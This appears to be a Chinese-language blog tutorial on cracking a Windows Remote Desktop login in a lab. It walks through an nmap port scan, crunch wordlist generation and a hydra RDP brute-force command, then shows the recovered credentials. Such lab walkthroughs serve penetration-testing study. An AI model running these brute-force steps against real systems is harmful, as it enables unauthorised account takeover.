天天看点

Hydra破解远程端口(3389)

一、实验环境

Linux kali

目标主机 IP

192.168.31.22

先用nmap扫描目标主机开放的端口

nmap 192.168.31.22
           
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-23 19:14 CST
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.07 seconds
           

如果出现检测不到目标主机的情况,就用下面的指令

nmap -PN -sT 192.168.31.22 
           
Hydra破解远程端口(3389)

kali的字典存放目录

/usr/share/wordlists/dirbuster
           

这个目录有部分可供使用的字典,但我们可以更有针对性的制作字典。

crunch 1 4 1234567890 -o password1.txt 
生成长度为1-4的数字密码,将结果输出到password1.txt中 
           

hydra [目标主机IP] rdp -L [用户名字典] -P[密码字典] -V -F

-V	显示爆破过程
-F  遇到正确的用户名及密码停止爆破
           
hydra 192.168.31.22 rdp -L /usr/share/wordlists/dirbuster/password2.txt -P /usr/share/wordlists/dirbuster/password1.txt -V -F
           
Hydra破解远程端口(3389)

用户名:PC 密码:1

做实验才弄怎么简单的密码,现实生活中要爆破很久

继续阅读